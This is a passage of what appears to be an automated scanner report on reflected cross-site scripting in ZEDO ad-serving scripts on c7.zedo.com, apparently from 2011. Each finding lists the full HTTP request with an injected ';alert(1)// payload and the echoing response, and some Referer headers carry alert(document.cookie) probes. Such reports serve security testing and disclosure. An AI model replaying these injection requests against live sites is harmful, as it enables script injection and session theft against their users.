Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; ZCBC=1; ZEDOIDX=29; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFcat=1220,167,14:1220,101,9; ZFFAbh=749B826,20|1483_758#365; FFad=0:0; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; __qca=P0-2130372027-1295906131971;

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 985
Content-Type: application/x-javascript
Set-Cookie: FFad=0:0:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=0,0,0:1220,167,14:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "419234-82a5-4988a5a7ea280"
X-Varnish: 1882666994
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=555
Expires: Fri, 28 Jan 2011 16:54:00 GMT
Date: Fri, 28 Jan 2011 16:44:45 GMT
Connection: close

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

p9.src='http://r1.zedo.com/ads2/p/'+Math.random()+'/ERR.gif?v=bar/v16-401/c5;referrer='+document.referrer+';tag=c7.zedo.com/bar/v16-401/c5/jsc/fm.js;qs=a8cdf'-alert(1)-'3d2ba540778=1;';

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=0;var zzPat='';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=;z="+Math.random();}

if(
...[SNIP]...

4.239. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [q parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://c7.zedo.com
Path:	/bar/v16-401/c5/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b36ef'%3balert(1)//bf55c3b27b0 was submitted in the q parameter. This input was echoed as b36ef';alert(1)//bf55c3b27b0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /bar/v16-401/c5/jsc/fm.js?c=101&a=0&f=&n=1220&r=13&d=9&q=b36ef'%3balert(1)//bf55c3b27b0&$=&s=69&l=http%3A//hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/&z=0.11480318708345294 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; FFgeo=5386156; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; ZFFAbh=749B826,20|1483_758#365

Response (redirected)

4.240. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [q parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://c7.zedo.com
Path:	/bar/v16-401/c5/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a5468"%3balert(1)//ca9a118c5a2 was submitted in the q parameter. This input was echoed as a5468";alert(1)//ca9a118c5a2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /bar/v16-401/c5/jsc/fm.js?c=101&a=0&f=&n=1220&r=13&d=9&q=a5468"%3balert(1)//ca9a118c5a2&$=&s=69&l=http%3A//hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/&z=0.11480318708345294 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; FFgeo=5386156; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; ZFFAbh=749B826,20|1483_758#365

Response (redirected)

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "86257539-809a-4988a5ada3000"
Vary: Accept-Encoding
X-Varnish: 1882667040 1882666656
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=37
Expires: Fri, 28 Jan 2011 16:41:50 GMT
Date: Fri, 28 Jan 2011 16:41:13 GMT
Connection: close
Content-Length: 1928

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=69;var zzPat='a5468";alert(1)//ca9a118c5a2';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=a5468";alert(1)//ca9a118c5a2;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;

var zzStr = "s=69;u=INmz6woBADYAAHrQ5V4AAACH~010411;z=" + Math.
...[SNIP]...

4.241. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [q parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://c7.zedo.com
Path:	/bar/v16-401/c5/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b0c81'%3balert(1)//d0aa9fd4ab0 was submitted in the q parameter. This input was echoed as b0c81';alert(1)//d0aa9fd4ab0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /bar/v16-401/c5/jsc/fm.js?c=167&a=0&f=&n=1220&r=13&d=14&q=b0c81'%3balert(1)//d0aa9fd4ab0&$=&s=126&l=http%3A//hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63723/0/cj/V12D7843BC0J-573I704K63342ADC1D6F3ADC1D6F3K82427K82131QK63359QQP0G00G0Q05BC4B4000001E/&z=0.9975781855173409 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(1)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; FFgeo=5386156; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; ZFFAbh=749B826,20|1483_758#365; ZCBC=1; FFad=0; FFcat=1220,101,9

Response

4.242. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [q parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://c7.zedo.com
Path:	/bar/v16-401/c5/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b513f"%3balert(1)//a126b16dd12 was submitted in the q parameter. This input was echoed as b513f";alert(1)//a126b16dd12 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /bar/v16-401/c5/jsc/fm.js?c=167&a=0&f=&n=1220&r=13&d=14&q=b513f"%3balert(1)//a126b16dd12&$=&s=126&l=http%3A//hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63723/0/cj/V12D7843BC0J-573I704K63342ADC1D6F3ADC1D6F3K82427K82131QK63359QQP0G00G0Q05BC4B4000001E/&z=0.9975781855173409 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(1)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; FFgeo=5386156; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; ZFFAbh=749B826,20|1483_758#365; ZCBC=1; FFad=0; FFcat=1220,101,9

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1220,167,14:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "419234-82a5-4988a5a7ea280"
Vary: Accept-Encoding
X-Varnish: 1882666994
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=44
Expires: Fri, 28 Jan 2011 16:41:50 GMT
Date: Fri, 28 Jan 2011 16:41:06 GMT
Connection: close
Content-Length: 1931

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=126;var zzPat='b513f";alert(1)//a126b16dd12';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=b513f";alert(1)//a126b16dd12;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;

var zzStr = "s=126;u=INmz6woBADYAAHrQ5V4AAACH~010411;z=" + Math
...[SNIP]...

4.243. http://c7.zedo.com/bar/v16-401/c5/jsc/fmr.js [$ parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://c7.zedo.com
Path:	/bar/v16-401/c5/jsc/fmr.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 976a8'%3balert(1)//8b6cb345271 was submitted in the $ parameter. This input was echoed as 976a8';alert(1)//8b6cb345271 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /bar/v16-401/c5/jsc/fmr.js?c=101&a=0&f=&n=1220&r=13&d=9&q=&$=976a8'%3balert(1)//8b6cb345271&s=69&l=http%3A//hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/&z=0.11480318708345294 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; FFgeo=5386156; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; ZFFAbh=749B826,20|1483_758#365; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1220:976a8';alert(1)//8b6cb345271;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "86257539-809a-4988a5ada3000"
Vary: Accept-Encoding
X-Varnish: 1882667040 1882666656
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=41
Expires: Fri, 28 Jan 2011 16:41:50 GMT
Date: Fri, 28 Jan 2011 16:41:09 GMT
Connection: close
Content-Length: 1931

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=69;var zzPat=',976a8';alert(1)//8b6cb345271';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=,976a8';alert(1)//8b6cb345271;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;

...[SNIP]...

4.244. http://c7.zedo.com/bar/v16-401/c5/jsc/fmr.js [$ parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://c7.zedo.com
Path:	/bar/v16-401/c5/jsc/fmr.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 41e06"%3balert(1)//3fda4fef972 was submitted in the $ parameter. This input was echoed as 41e06";alert(1)//3fda4fef972 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /bar/v16-401/c5/jsc/fmr.js?c=101&a=0&f=&n=1220&r=13&d=9&q=&$=41e06"%3balert(1)//3fda4fef972&s=69&l=http%3A//hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/&z=0.11480318708345294 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; FFgeo=5386156; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; ZFFAbh=749B826,20|1483_758#365; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1220:41e06";alert(1)//3fda4fef972;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "86257539-809a-4988a5ada3000"
Vary: Accept-Encoding
X-Varnish: 1882667040 1882666656
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=42
Expires: Fri, 28 Jan 2011 16:41:50 GMT
Date: Fri, 28 Jan 2011 16:41:08 GMT
Connection: close
Content-Length: 1931

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=69;var zzPat=',41e06";alert(1)//3fda4fef972';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=,41e06";alert(1)//3fda4fef972;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;

var zzStr = "s=69;u=INmz6woBADYAAHrQ5V4AAACH~010411;z=" + Math.
...[SNIP]...

4.245. http://c7.zedo.com/bar/v16-401/c5/jsc/fmr.js [l parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://c7.zedo.com
Path:	/bar/v16-401/c5/jsc/fmr.js

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 132e9'%3balert(1)//cb504a93756 was submitted in the l parameter. This input was echoed as 132e9';alert(1)//cb504a93756 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /bar/v16-401/c5/jsc/fmr.js?c=101&a=0&f=&n=1220&r=13&d=9&q=&$=&s=69&l=http%3A//hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/132e9'%3balert(1)//cb504a93756&z=0.11480318708345294 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; FFgeo=5386156; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; ZFFAbh=749B826,20|1483_758#365; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "86257539-809a-4988a5ada3000"
Vary: Accept-Encoding
X-Varnish: 1882667040 1882666656
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=37
Expires: Fri, 28 Jan 2011 16:41:50 GMT
Date: Fri, 28 Jan 2011 16:41:13 GMT
Connection: close
Content-Length: 1900

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=69;var zzPat='';var zzCu
...[SNIP]...
DYAAHrQ5V4AAACH~010411;p=6;f=990638;h=922865;k=http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/132e9';alert(1)//cb504a93756">
...[SNIP]...

4.246. http://c7.zedo.com/bar/v16-401/c5/jsc/fmr.js [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://c7.zedo.com
Path:	/bar/v16-401/c5/jsc/fmr.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2b427'-alert(1)-'52c0c108d3d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /bar/v16-401/c5/jsc/fmr.js?2b427'-alert(1)-'52c0c108d3d=1 HTTP/1.1
Host: c7.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
